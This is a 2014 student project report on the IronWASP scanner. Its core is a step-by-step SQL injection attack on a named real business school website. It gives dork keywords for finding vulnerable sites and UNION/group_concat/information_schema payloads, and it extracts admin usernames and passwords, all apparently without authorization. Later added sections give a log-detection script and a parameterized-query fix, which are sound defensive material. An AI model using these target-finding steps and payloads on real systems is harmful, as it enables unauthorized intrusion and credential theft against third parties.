Project Report
IRONWASP
Class Teacher
Sir Waqar Ahmed
PAF KIET
Submitted by
Muhammad BurhanShafaat
54596
DEPARTMENT OF COMPUTER SCIENCE
PAF Karachi Institute of Economics and Technology
28-D, Block 6, P.E.C.H.S, Karachi 75400
Dec 2014
PREFACE
It gives me a sense of satisfaction and pleasure at the same time while writing the
preface for the IRONWASP project report. It took several weeks of immense hard work and
tiredness to complete this project.
My intention has been to produce a report which completely covers all the aspects of
this project. Therefore, I have presented the project report in a way which is accessible to
everyone.
As the use of computers in industry, commerce, education and many other fields of
life has become very common, the question of information and system security arises.
Avoiding attacks on information and networks wouldn't be that easy. It requires a lot of effort
to avoid these attacks. This report discusses SQL injection vulnerability identification and
attacking.
A thorough study of the topic has been carried out. All the material has been collected
in relevance with the SQL injection vulnerability. This report is carefully designed to offer
information appropriate for SQL injection vulnerability. All the topics are comprehensively
dealt with to give the reader a firm grounding in the issue. Explanations of concepts and
principles are concise and written in clear and simple language with supportive illustrations
where required. Different diagrams are provided to make this report even more logical and
understandable for the reader.
Muhammad Burhan
ACKNOWLEDGMENT
First of all, I thank Almighty Allah who praised me with the ability to think, work and
deliver what I was assigned to do. Without His mercy it was not possible at all.
Secondly, I am grateful to my teacher Mr. Waqar Ahmed, who was always there to
guide me and sort out my problems. I also acknowledge all my teachers, who throughout my
studies helped and guided me, the departmental staff, and the university staff.
I then wish to show appreciation to all those individuals who have helped me in any
way in the making of this project.
Muhammad Burhan
TABLE OF CONTENTS
PREFACE
ACKNOWLEDGEMENTS
TABLE OF CONTENTS
Chapter 1 INTRODUCTION
1.1 Objective
1.2 Theoretical Background
1.3 Project Scope
Chapter 2 IRONWASP
2.1 Introduction to Iron WASP
2.2 Reason for Iron WASP Selection
Chapter 3 LAUNCHING ATTACK
3.1 How to Find Target?
3.2 Target
3.3 Start Attack
Chapter 4 CONCLUSION
4.1 Conclusion
Appendix A REFERENCES
A.1 WEB References
CHAPTER 1
INTRODUCTION
1 Introduction
This chapter gives a brief introduction to the project. It provides the objective,
theoretical background and project scope.
1.1 Objective
The aim of my project is to use IRONWASP to detect an SQL injection vulnerability in a
website and then to attack the affected website using SQL injection.
1.2 Theoretical Background
What is SQL injection?
SQL injection is a code injection technique, used to attack data-driven
applications, in which malicious SQL statements are inserted into an entry field for
execution (e.g. to dump the database contents to the attacker).
What is software vulnerability?
A software vulnerability is a security flaw, glitch, or weakness found
in software or in an operating system (OS) that can lead to security concerns. An
example of a software flaw is a buffer overflow.
What is IronWASP?
IronWASP (Iron Web application Advanced Security testing Platform) is one
of the world's best web vulnerability scanners.
1.3 Project Scope
1- To understand and demonstrate the working of Iron WASP.
2- Identify vulnerability using Iron WASP.
3- Perform attack using SQL Injection.
CHAPTER 2
IRONWASP
2 Iron WASP
This chapter gives an introduction to Iron WASP and the reasons for its selection.
2.1 Introduction to Iron WASP
IronWASP (Iron Web application Advanced Security testing Platform) is one of the
world's best web vulnerability scanners. It is developed by Lavakumar Kuppan. It is
designed to make automated scanning and testing an easy process. It is an open source system
for web application vulnerability testing. It is designed to be customizable to the extent where
users can create their own custom security scanners using it. Though an advanced user with
Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the
tool's features are simple enough to be used by absolute beginners.
Figure 1: Iron WASP Interface
2.2 Reasons for Iron WASP Selection
1- It's Free and Open source.
2- GUI based and very easy to use, no security expertise required.
3- Powerful and effective scanning engine.
4- Supports recording Login sequence.
5- Reporting in both HTML and RTF formats.
6- Checks for over 25 different kinds of web vulnerabilities.
7- False Positives detection support.
8- False Negatives detection support.
9- Industry leading built-in scripting engine that supports Python and Ruby.
10- Extensible via plug-ins or modules in Python, Ruby, C# or [Link].
11- Comes bundled with a growing number of Modules built by researchers in the
security community.
CHAPTER 3
LAUNCHING ATTACK
3 Launching Attack
This chapter explains how the attack is launched. It provides details regarding the
target and launching the attack.
3.1 How to find the target?
Searching on [Link] using the following keywords will help you find a target:
inurl: php?category=
inurl: php?id=
or with similar keywords
3.2 Target
My target is The Laureate Business School (website: [Link]),
shown in Figure 2, which is affiliated with RPHAH International University.
The university offers several undergraduate programs (BS, BSc, BBA, etc.) as well as
graduate programs (MBA, etc.). Figure 3 shows that SQL injection was detected on the university
website (i.e. [Link]).
Figure 2: Target website.
Figure 3: SQL Injection Vulnerability Detected
3.3 Start Attack
Step 1: Use the ORDER BY clause to find the number of columns in the table.
Use the ORDER BY clause and increase the column number (1, 2, 3, ... n) until you get an error.
For example:
[Link]
[Link]
[Link]
:
:
[Link]
Figure 4 shows the error returned for the 7th column, which
means that the table displaying the data has only 6 columns.
Figure 4: Shows error on 7th column.
Step 2: Finding columns that are displayed on the page.
To find the columns that are displayed on the web page, we use a UNION
query. For example:
[Link]
Figure 5: Displayed Columns.
Step 3: Using the group_concat function.
The group_concat function is used to display all table names of the given
schema. For example:
[Link]
ame)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1
The above link displayed a few tables belonging to the current schema:
admin, e-news, email_group, email_management, image_gallery, images_listing, navigation,
navigation_bk, news_and_events, notice_board and pages.
Figure 6: Table names.
Step 4: Find the hex of the target table.
We have to enter the hex code for the table name in the query to execute it
successfully. The admin table looks more interesting. Therefore I found the hex code of
admin, which is 61646d696e.
Step 5: Finding column names of the table.
Group_concat will be used to display the column names. For example:
[Link]
_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order
+by+1
Figure 7: Shows the column names of admin table.
Step 6: Retrieving data.
In the last step I successfully retrieved the column names (i.e. username and
password). So I used the URL below to retrieve the data. Figure 8 shows the results of
the admin table.
[Link]
+,5,6+from+admin+order+by+1
Figure 8: Shows the data of admin table.
Step 7: Beyond this is not ethical.
I feel that moving ahead, such as deleting, modifying and inserting data into tables, is
not ethical.
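The request sequence in Steps 1 to 6 leaves a recognisable trail in the web server's access log. The following detection sketch is an added example, not part of the original report or of IronWASP: it flags clients whose requests progress through several of those stages. The log lines, IP addresses and the /page.php path are constructed sample data, and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Signatures for the stages described in Steps 1-6, matched on the decoded query string.
STAGES = [
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select",       re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("group_concat",       re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("hex_literal",        re.compile(r"=\s*0x[0-9a-f]{4,}", re.I)),
]
# Common Log Format prefix: client IP, ident, user, [timestamp], "METHOD target PROTOCOL"
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def classify(target):
    """Return the stage names whose signature appears in the request's query string."""
    query = unquote_plus(urlsplit(target).query)
    return [name for name, rx in STAGES if rx.search(query)]

def scan(lines):
    """Map client IP -> distinct stages seen from that client, in order of first sighting."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for stage in classify(target):
            if stage not in seen[ip]:
                seen[ip].append(stage)
    return dict(seen)

def alerts(lines, min_stages=2):
    """Clients that reached at least min_stages distinct stages (a progressing attempt)."""
    return {ip: s for ip, s in scan(lines).items() if len(s) >= min_stages}

# Constructed sample log: documentation IP ranges and a hypothetical /page.php endpoint.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Dec/2014:10:00:01 +0000] "GET /page.php?id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Dec/2014:10:00:05 +0000] "GET /page.php?id=3+order+by+7 HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Dec/2014:10:00:09 +0000] "GET /page.php?id=-3+union+select+1,2,3,4,5,6 HTTP/1.1" 200 5200',
    '203.0.113.9 - - [01/Dec/2014:10:00:15 +0000] "GET /page.php?id=-3+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables HTTP/1.1" 200 5400',
    '198.51.100.7 - - [01/Dec/2014:10:00:20 +0000] "GET /news.php?sort=order%20by%20date HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, stages in alerts(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

Requiring two or more distinct stages per client keeps a legitimate parameter such as `sort=order by date` from raising an alert on its own.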
CHAPTER 4
CONCLUSION
4 Conclusion
As you have seen, I demonstrated the SQL injection technique. Using SQL injection, we can
insert, update and delete any data as well as database objects (like tables, views, etc.).
Therefore, desktop and web applications should be built on standards to avoid
attacks. Nowadays there are several software products available which show the presence
of vulnerabilities in web and desktop applications.
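What building to a standard means for the flaw demonstrated in this report, shown as an added example that is not part of the original report: the same lookup written with string concatenation and then with input validation plus a bound parameter. An in-memory SQLite database with an assumed six-column pages table and an admin table stands in for the site's database; all data and function names are constructed.

```python
import sqlite3

# Constructed input of the kind shown in Step 6 (UNION query against the admin table).
INJECTED = "0 UNION SELECT 1,2,3,username,5,password FROM admin"

def make_db():
    """In-memory stand-in for the site's database (assumed schema, constructed rows)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT,
                            author TEXT, created TEXT, status TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO pages VALUES (1, 'Home', 'Welcome', 'staff', '2014-12-01', 'live');
        INSERT INTO admin VALUES ('admin', 'constructed-hash-value');
    """)
    return db

def get_page_vulnerable(db, page_id):
    # BEFORE: the request value becomes part of the statement text and is parsed as SQL.
    return db.execute("SELECT * FROM pages WHERE id = " + page_id).fetchall()

def get_page_safe(db, page_id):
    # AFTER: reject anything that is not a plain ASCII integer, then bind the value.
    # The statement text is fixed, so the input can never add clauses to it.
    if not (page_id.isascii() and page_id.isdigit()):
        return []
    return db.execute("SELECT * FROM pages WHERE id = ?", (int(page_id),)).fetchall()

def demo():
    """Run both versions on a normal id and on the injected value."""
    db = make_db()
    return {
        "vulnerable_normal": get_page_vulnerable(db, "1"),
        "vulnerable_injected": get_page_vulnerable(db, INJECTED),
        "safe_normal": get_page_safe(db, "1"),
        "safe_injected": get_page_safe(db, INJECTED),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```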
APPENDIX A
WEB REFERENCES
Web References
[1] [Link] (Target Website)
[2] [Link] (Convert String to Hex)